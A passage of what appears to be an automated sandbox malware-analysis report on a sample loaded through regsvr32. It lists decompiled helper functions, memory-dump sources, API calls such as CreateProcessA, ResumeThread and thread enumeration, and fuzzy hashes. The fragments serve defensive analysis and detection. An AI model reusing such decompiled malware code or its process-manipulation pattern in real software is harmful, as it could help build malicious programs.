                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: 34e0c8a97e708d79294c3638a6597767d46d45fe5b3f620743e9c83d5f16f40e
                • Instruction ID: badfe7ba2e56d5a0f55c386f02d1b855f0a0f06b29efc8458f233ebc43c05347
                • Opcode Fuzzy Hash: 34e0c8a97e708d79294c3638a6597767d46d45fe5b3f620743e9c83d5f16f40e
                • Instruction Fuzzy Hash: A7011E75900109FFDF14EF9AD848AAFBBBCEB89750F108066EA19D2144CB709684CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCB4B5 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F,00000001,?,00000000), ref: 04BCB4CA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 37991e01552d67a18f47d3b9148c7bcd3e7fdcc5d24b538bc638a9b8de7cff8b
                • Instruction ID: d1354a3ddd80f80a229460586fce631eadaa229637d6906dc6c3e9d126bb20cb
                • Opcode Fuzzy Hash: 37991e01552d67a18f47d3b9148c7bcd3e7fdcc5d24b538bc638a9b8de7cff8b
                • Instruction Fuzzy Hash: 90314A72A04219EFDB10DF99E8929ADB7B5FB84314B5540EED604AB200D330FE41CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F134A Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E031F134A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x31fa290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                0x031f134f
                0x031f1354
                0x031f1362
                0x031f1368
                0x031f136c
                0x031f13dd
                0x031f136e
                0x031f1372
                0x031f1375
                0x031f1378
                0x031f137f
                0x031f1380
                0x031f1381
                0x031f1385
                0x031f1388
                0x031f138f
                0x031f1395
                0x031f1396
                0x031f1396
                0x031f139d
                0x031f139e
                0x031f139f
                0x031f13a3
                0x031f13af
                0x031f13b5
                0x031f13b6
                0x031f13b6
                0x031f13b8
                0x031f13be
                0x031f13c0
                0x031f13c5
                0x031f13c6
                0x031f13c6
                0x031f13cc
                0x031f13d5
                0x031f13d7
                0x031f13da
                0x031f13e9

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 031F1362
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e7c49944922e8b9e5234617a86aedc78fc14341eac7e70251164b20db5b9e542
                • Instruction ID: 86c3adbf5af5d78b65a75166f5c800c7859addf70d2efd2b9687b82bf668c586
                • Opcode Fuzzy Hash: e7c49944922e8b9e5234617a86aedc78fc14341eac7e70251164b20db5b9e542
                • Instruction Fuzzy Hash: FE11D631245345EFEB09CF29C451BED7BA9DF5B368F18409AE5409B692C277850BC760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCB6E7 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(?,00000003,04BED514,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BCB722
                  • Part of subcall function 04BDD6E3: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04BEE480), ref: 04BDD6FA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleInformationModuleProcessQuery
                • String ID:
                • API String ID: 2776635927-0
                • Opcode ID: ba883b4d0cf2e0f744b23a741b6eda0125f4bf05e9382b6fe91cbdcfd147f694
                • Instruction ID: c57f161e3a49707a4c301a3e61e07d6a8d1759deb87263228290e81c70dc7304
                • Opcode Fuzzy Hash: ba883b4d0cf2e0f744b23a741b6eda0125f4bf05e9382b6fe91cbdcfd147f694
                • Instruction Fuzzy Hash: ED219076644205AFDB25CF99E8C2D6E77A9EF443A472444AFEC45DB110E631F900CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC380B Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04BC385D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: e3b75c7a444d84637bd251315c7a164b43bcca1fd0450f2e3b14fa45b98ffb7e
                • Instruction ID: e61d7480f3295b6f767c23a6b9937a0def37b0d0bc41746ac76628252f4db55b
                • Opcode Fuzzy Hash: e3b75c7a444d84637bd251315c7a164b43bcca1fd0450f2e3b14fa45b98ffb7e
                • Instruction Fuzzy Hash: 55111E32200209AFDF018FA9DC809DA7BA9FF48374B058169FD1996160C735E921DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F167E Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 34%
                			E031F167E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x31fa2d8; // 0x240d5a8
				_t4 = _t15 + 0x31fb39c; // 0x5608944
				_t20 = _t4;
				_t6 = _t15 + 0x31fb124; // 0x650047
				_t17 = E031F51C7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E031F2E50(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                0x031f1688
                0x031f168a
                0x031f1691
                0x031f1692
                0x031f1693
                0x031f1694
                0x031f169a
                0x031f169f
                0x031f169f
                0x031f16a9
                0x031f16bb
                0x031f16c2
                0x031f16f1
                0x031f16c4
                0x031f16c9
                0x031f16ee
                0x031f16cb
                0x031f16ce
                0x031f16d5
                0x031f16e0
                0x031f16d7
                0x031f16da
                0x031f16da
                0x031f16e4
                0x031f16e4
                0x031f16c9
                0x031f16f8

                APIs
                  • Part of subcall function 031F51C7: SysFreeString.OLEAUT32(?), ref: 031F52A6
                  • Part of subcall function 031F2E50: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,031F6B5B,004F0053,00000000,?), ref: 031F2E59
                  • Part of subcall function 031F2E50: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,031F6B5B,004F0053,00000000,?), ref: 031F2E83
                  • Part of subcall function 031F2E50: memset.NTDLL ref: 031F2E97
                • SysFreeString.OLEAUT32(00000000), ref: 031F16E4
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: b082491b6879ab38d4c04496c76eb618894e5caea6676124b2ece59aaa067bf3
                • Instruction ID: 51756a30266fa3af58226045809169127f25a501053272d74d561175fbddf205
                • Opcode Fuzzy Hash: b082491b6879ab38d4c04496c76eb618894e5caea6676124b2ece59aaa067bf3
                • Instruction Fuzzy Hash: 97019E35504128FFCF10EBA8CC04DAEBBB9FB0C720F444525EA01E6020E3B099A68B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC6552 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCFDC6: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDE5
                  • Part of subcall function 04BCFDC6: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDF0
                  • Part of subcall function 04BCFDC6: _wcsupr.NTDLL ref: 04BCFDFD
                  • Part of subcall function 04BCFDC6: lstrlenW.KERNEL32(00000000), ref: 04BCFE05
                • ResumeThread.KERNEL32(00000004,?,04BC3875,?), ref: 04BC6567
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                • String ID:
                • API String ID: 3646851950-0
                • Opcode ID: a82731d1ae434646a2b978fe6d1836d9ebaf98c600f57878732b586c362a4a28
                • Instruction ID: aebbab4d4e70a7b4225b2b887262e0e3dddd89d01e84c45b0edd6b268b68a255
                • Opcode Fuzzy Hash: a82731d1ae434646a2b978fe6d1836d9ebaf98c600f57878732b586c362a4a28
                • Instruction Fuzzy Hash: 3FD05E30A44306A6EB316B21CD84F16BFA39FA0A54F1085DCF9C855068D772F810A625
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE65B4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 04BE65A6
                  • Part of subcall function 04BE66EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A5BC,04BC0000), ref: 04BE6768
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 56bde953d5f8c1c40fd08f3ac811fd7845840093429552dd00d2fea61522f0b6
                • Instruction ID: 726ed4a4917c3761f2e7653a818503385a78b595d9d2e9ebca13eacb119fceda
                • Opcode Fuzzy Hash: 56bde953d5f8c1c40fd08f3ac811fd7845840093429552dd00d2fea61522f0b6
                • Instruction Fuzzy Hash: 82A001D63B9106BF32086263AD16C7B179CC8E8A653B0A99AE42294054AA90B9552D35
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE6599 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 04BE65A6
                  • Part of subcall function 04BE66EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A5BC,04BC0000), ref: 04BE6768
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 0cc0da6cba25d0a5a1adf47fa09bc7c39eccfcfb1d208160f69088ace29492b7
                • Instruction ID: 0f26c0b4fe25bb8f1a799da5001179ba0ca3dfa97f532bb817cefd5e099142bc
                • Opcode Fuzzy Hash: 0cc0da6cba25d0a5a1adf47fa09bc7c39eccfcfb1d208160f69088ace29492b7
                • Instruction Fuzzy Hash: 98A012C13741057F310411135D01C37034CC4E4910370A089F010900006A4079001C30
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC8F9E Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: ec8939f58ac77cb3049e30e696d014ee16862986ed7b85e8184f862beb1b9947
                • Instruction ID: 6fa404e4d5814420f539d6d5dac01d89e2d988d593f4a81cfc60c60d10415159
                • Opcode Fuzzy Hash: ec8939f58ac77cb3049e30e696d014ee16862986ed7b85e8184f862beb1b9947
                • Instruction Fuzzy Hash: F2B01231000200ABDA11DB21ED05F067B21E7D0700F004422B2089A061C3355C64EB34
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC57E0 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                • RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 21c5181a4ca945398a9e7c0a4bb707d82a03ae4049275382920862d3069f7f67
                • Instruction ID: ee53a5347e35d6af1d72497b428b267cb5e7313e08048032e0cb803f27a4d463
                • Opcode Fuzzy Hash: 21c5181a4ca945398a9e7c0a4bb707d82a03ae4049275382920862d3069f7f67
                • Instruction Fuzzy Hash: 11B01231040200EFDA019B21DD05F057A21F7D0700F104022B2045B461C2354C20FB34
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2114 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F2114(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x31fa290, 0, _a4); // executed
				return _t2;
			}




                0x031f2120
                0x031f2126

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 0cf721cb384ca095c9950fc29dbcc0405a24e0e1e595d1e6b5202cc55bcfd920
                • Instruction ID: 0b5d6607704594be5d5491870c1a243debaf49adf9e1220cb71b0f8854138582
                • Opcode Fuzzy Hash: 0cf721cb384ca095c9950fc29dbcc0405a24e0e1e595d1e6b5202cc55bcfd920
                • Instruction Fuzzy Hash: BEB01231114100AFCB067B00DD04F067B32FB5CB40F104010B20940068C3328470FF28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F24F7 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F24F7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E031F2B0C(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E031F2114(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E031F2C11(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E031F5374(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E031F78F2(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                0x031f2502
                0x031f2505
                0x031f250e
                0x031f2511
                0x031f2514
                0x031f2517
                0x031f2613
                0x031f2617
                0x031f2529
                0x031f2535
                0x031f253c
                0x031f2543
                0x00000000
                0x00000000
                0x031f2549
                0x031f2551
                0x00000000
                0x00000000
                0x031f2557
                0x031f2560
                0x031f2564
                0x00000000
                0x00000000
                0x031f2566
                0x031f256d
                0x031f2572
                0x031f2574
                0x031f2577
                0x031f25f8
                0x031f25ff
                0x031f2601
                0x00000000
                0x00000000
                0x031f2603
                0x031f2607
                0x031f260c
                0x031f260c
                0x00000000
                0x031f2607
                0x031f257e
                0x031f2586
                0x031f2586
                0x031f258f
                0x031f259d
                0x031f25f4
                0x031f25f4
                0x00000000
                0x031f25c0
                0x031f25c3
                0x00000000
                0x031f25c3
                0x031f259d
                0x031f25d2
                0x031f25e0
                0x031f25e5
                0x031f25e7
                0x031f25fc
                0x00000000
                0x031f25fc
                0x031f25e9
                0x031f25ef
                0x031f25f2
                0x00000000
                0x00000000
                0x00000000
                0x031f25f2

                APIs
                • memcpy.NTDLL(00000000,?,?,?,?,031F7307,00000001,?,?,031F7307), ref: 031F257E
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction ID: ad00dfd5e4dd20a81d8fa5c2cf77029f8d81bc97392d3876ce44a16673cbbde4
                • Opcode Fuzzy Hash: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction Fuzzy Hash: D1316F79900219AFDF14DEA8C990EEDB3B8AB08314F1448E9EB15A7150D7309E86DF20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDC3B1 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,74E5F710,00000000,00000000,?,?,?,04BD2C46,?), ref: 04BDC443
                  • Part of subcall function 04BC57A1: memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,04BDC3FA,?,00000001,?,?,?,?), ref: 04BC57C4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreememcpy
                • String ID:
                • API String ID: 1301464996-0
                • Opcode ID: 21a6d29f9a83ee92f931b7525dd5f5f52fab1f2d824f98dcd3f1ec68dc0a5f15
                • Instruction ID: 963a78d6ad13dd3681983942d20005d9207d90f4f84d0ff07b061330b68f9c61
                • Opcode Fuzzy Hash: 21a6d29f9a83ee92f931b7525dd5f5f52fab1f2d824f98dcd3f1ec68dc0a5f15
                • Instruction Fuzzy Hash: 82118C75694201EBDB149F5DDC90EBE7BB8EB88204F5000EAF5029B241E674BD01DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD0AF6 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,04BEE3A4,00000018,04BCAA0D,06248E36,?,04BCAA0D,06248E36,?,04BCAA0D,06248E36,?,?,?,?,04BCAA0D), ref: 04BD0BAB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: b3943cc5aa34e189a9fc1313a29f40805fba43c02e14cace0e67be61af089916
                • Instruction ID: 92d3921a955ffb3dbcb5af328ad61f422e9501ddbb455adc8cc3a6f32c980a92
                • Opcode Fuzzy Hash: b3943cc5aa34e189a9fc1313a29f40805fba43c02e14cace0e67be61af089916
                • Instruction Fuzzy Hash: 7F116A71604209AFEB11EF1AE945C663BA5EBC0718F0481ABE40D8F2A1E734FC04CB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC9D25 Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,04BEE21C,?,00000000,?,?,?,00000000,04BD4935,04BE3A35,00000000,00000000), ref: 04BC9D96
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(04BEE21C,0000002E,00000000,00000000,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFF9D
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(00000004,00000020,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFFAC
                  • Part of subcall function 04BE0929: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,04BD47CC,?,00000001), ref: 04BE094F
                  • Part of subcall function 04BE0929: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04BE095B
                  • Part of subcall function 04BE0929: GetModuleHandleA.KERNEL32(?,0624978E,?,00000000,00000000), ref: 04BE097B
                  • Part of subcall function 04BE0929: GetProcAddress.KERNEL32(00000000), ref: 04BE0982
                  • Part of subcall function 04BE0929: Thread32First.KERNEL32(00000001,0000001C), ref: 04BE0992
                  • Part of subcall function 04BE0929: CloseHandle.KERNEL32(00000001), ref: 04BE09DA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                • String ID:
                • API String ID: 2627809124-0
                • Opcode ID: b01101196422086b63c7957756463c846493cbce6e027fd80c5b4f5ea57f62ce
                • Instruction ID: 36fe0bc3f23dbad5dc8b3bfb75502fcb0e1b2e1b9415f9a98939b6723a69e8fb
                • Opcode Fuzzy Hash: b01101196422086b63c7957756463c846493cbce6e027fd80c5b4f5ea57f62ce
                • Instruction Fuzzy Hash: E7012CB5614119BFEB01EBAAED84C9FB7ADEB85248B00009AF501A7101DA75FE00DB71
                Uniqueness

                Uniqueness Score: -1.00%

